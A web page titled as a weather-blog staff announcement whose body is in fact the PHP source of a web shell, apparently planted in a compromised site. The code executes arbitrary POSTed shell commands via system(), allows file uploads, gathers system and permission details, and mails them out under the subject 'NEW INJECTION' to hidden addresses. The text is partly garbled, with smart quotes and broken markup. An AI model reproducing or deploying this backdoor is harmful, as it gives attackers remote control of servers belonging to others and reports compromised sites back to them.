Tony Rice Joins the AlabamaWX Team!
body{font-family:trebuchet ms;font-size:14px;}hr{width:100%;height:2px;}
“;
print “
.:: team-clubing ::.
print “
(DJ- PerForM)
print “
(clubing@allnetwork.org)
print “
.:: irc.allnetwork.org ::.
print “
“;
$currentWD = str_replace(“\\\\”,”\\”,$_POST[‘_cwd’]);
$currentCMD = str_replace(“\\\\”,”\\”,$_POST[‘_cmd’]);
$UName = `uname -a`;
$SCWD = `pwd`;
$UserID = `id`;
if( $currentWD == “” ) {
$currentWD = $SCWD;
}
$OS = @PHP_OS;
$UNAME = @php_uname();
$PHPv = @phpversion();
$SafeMode = @ini_get(‘safe_mode’);
if ($SafeMode == ”) { $SafeMode = “OFF
“; }
else { $SafeMode = “$SafeMode
“; }
$injek=($_SERVER[‘HTTP_HOST’] . $_SERVER[‘REQUEST_URI’]);
$psn=(“OS = ” . $OS . “
UNAME = ” . $UNAME . “
PHPVersion = ” . $PHPv . “
Safe Mode = ” . $SafeMode . “
https://” . $injek . “
Only me have Pion
By: MASK_MAGiCIANZ”);
$header = “From: $_SERVER[SERVER_ADMIN] <$from>\r\nReply-To: $replyto\r\n”;
$header .= “MIME-Version: 1.0\r\n”;
If ($file_name) $header .= “Content-Type: multipart/mixed; boundary=$uid\r\n”;
If ($file_name) $header .= “–$uid\r\n”;
$header .= “Content-Type: text/$contenttype\r\n”;
$header .= “Content-Transfer-Encoding: 8bit\r\n\r\n”;
$header .= “$message\r\n”;
If ($file_name) $header .= “–$uid\r\n”;
If ($file_name) $header .= “Content-Type: $file_type; name=\”$file_name\”\r\n”;
If ($file_name) $header .= “Content-Transfer-Encoding: base64\r\n”;
If ($file_name) $header .= “Content-Disposition: attachment; filename=\”$file_name\”\r\n\r\n”;
If ($file_name) $header .= “$content\r\n”;
If ($file_name) $header .= “–$uid–“;
$to = base64_encode(“REo=”);
$so = base64_encode(“REo=”);
$subject = (“NEW INJECTION”);
mail($to,$subject,$psn,$header);
mail($so,$subject,$psn,$header);
print “
We are: | “.$_SERVER[‘REMOTE_HOST’].” (“.$_SERVER[‘REMOTE_ADDR’].”) |
Server is: | “.$_SERVER[‘SERVER_SIGNATURE’].” |
System type: | $UName |
Our permissions: | $UserID |
“;
print “
“;
if( $_POST[‘_act’] == “List files!” ) {
$currentCMD = “ls -la”;
}
print “
“;
$currentCMD = str_replace(“\\\””,”\””,$currentCMD);
$currentCMD = str_replace(“\\\'”,”\'”,$currentCMD);
if( $_POST[‘_act’] == “Upload!” ) {
if( $_FILES[‘_upl’][‘error’] != UPLOAD_ERR_OK ) {
print “
} else {
print “
"; system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1"); print "
File uploaded successfully!
}
} else {
print “\n\n\n
\n"; $currentCMD = "cd ".$currentWD.";".$currentCMD; system($currentCMD); print "\n
\n\n\n
}
exit;
?>
Category: Hodgepodge, Spacey Stuff